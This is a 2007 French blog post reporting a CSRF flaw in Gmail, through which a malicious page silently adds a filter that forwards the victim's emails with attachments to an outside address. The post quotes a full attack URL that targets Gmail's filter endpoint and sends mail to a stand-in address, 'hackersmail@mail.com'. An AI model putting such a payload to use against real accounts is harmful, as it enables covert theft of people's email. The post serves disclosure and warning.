HTC Touch »
« HTC S730

Une Faille dans Gmail

• Article publié par Galice • Mercredi 26 septembre 2007 à 23:29

logo Gmail

Comment quelqu’un peut installer un backdoor persistant dans votre compte GMail et sur toutes vos conversations. Je répète, il est persistant. Il est très critique et très peu probable que vous le détecterez à moins que vous soyez un utilisateur averti et rigoureux.
La victime visite une page tout en étant connecté dans GMail.

Lors de l’exécution,
la page exécute un multipart/form-data POST à une des interfaces de GMail et injecte un filtre dans la liste des filtres de la victime. L’attaque écrit un filtre, qui recherche simplement des email avec des pièces jointes et les expédie à un email de son choix.

Ce filtre transférera automatiquement tous les emails s’assortissant à la règle.

Gardez à l’esprit que vos futurs emails seront aussi bien expédiés.

L’attaque demeure actuelle pour autant que la victime à le filtre dans sa liste de filtres, même si la vulnérabilité initiale, qui était la cause de l’infection, est fixée par Google.

La technique utilisée dans ce cas est connue en tant que Cross-Site Request Forgery ou CSRF. Un pirate pourrait détourner le compte Gmail d’un utilisateur après l’avoir attiré sur une page web infectée.

On attent un correctif de la part de Google. Yahoo est bien meilleur actuellement, particulièrement quand on parle de Web2.0 api.

L’exploit a été vérifiée par Ryan Naraine et d’autres crient au loup (Petko Petrov ). Cela fonctionne et c’est extrêmement méchant.

Citation :

 

http://www.site.com/divers/crsf?_method=POST&_
enctype=multipart/form-data&_action=https%3A//
mail.google.com/mail/h/evt1jvuj4ddv/%3Fv%3Dprf&cf2_
emc=true&cf2_email=hackersmail@mail.com&cf1_from&cf1_
to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s
=z&irf=on&nvp_bu_cftb=Create%20Filter

La demande ci-dessus passe par un utilitaire de redirection du CSRF où elle est convertie en forme de multipart/form-data POST et soumise au nom de la victime.

Dans une époque où toutes données sont en liberté, il me semble que vous n’avez aucune chance que cela vous arrive…

Verfier quand même dans vos filtres.

D’autres failles ont été dernièrement mises à jour dans Picasa et Blogger….

Partagez cet article : Ces icônes sont des liens vers des sites de partage de signet sociaux où les lecteurs peuvent partager et découvrir de nouveaux liens.
  • Digg
  • del.icio.us
  • MisterWong
  • Scoopeo
  • Technorati
  • Wikio
  • Furl
  • MSN-Reporter
  • Reddit
  • SphereIt
  • Bluegger
  • NewsVine
  • The-News
  • BlogMemes
  • Facebook
  • Google
  • Tomateo
  • TwitThis
  • YahooMyWeb

Laisser un commentaireImprimer cet articleEnvoyez ceci par e-mail

articles communs

Si vous avez aimé cet article, vous serez aussi intéressé par :

  • Configurer Gmail IMAP sur l’iPhone
  • Stockage dans Gmail, le compteur s’accélère!
  • Gmail Labs apporte de l’innovation par vague
  • Ajoutez le GPS à votre iPhone !
  • Des artistes russes interprètent le fonctionnement de Gmail


    • 0 Réponses pour “Une Faille dans Gmail”

    1. Pas de Commentaires

    Laissez un Commentaire

    Quelques règles sont à respecter avant la publication de votre commentaire :

    • pas de racisme, de xénophobie, d'homophobie
    • pas d'insultes envers d'autres membres
    • pas de majuscules utilisées de façon abusive
    • pas de langage en SMS,
    • ne pas poster de liens promotionnels et/ou pornographiques
    • votre commentaire doit avoir un rapport avec le sujet.

    Cet espace est celui de tous, merci de le respecter.

    La rédaction vous informe qu'il existe un temps d'attente entre l'envoi de votre commentaire et sa mise en ligne. Il est donc inutile de le re-publier.

    Vous pouvez suivre les commentaires sur cet article à travers ce flux RSS 2.0

                                                           
    HTC Touch »
    « HTC S730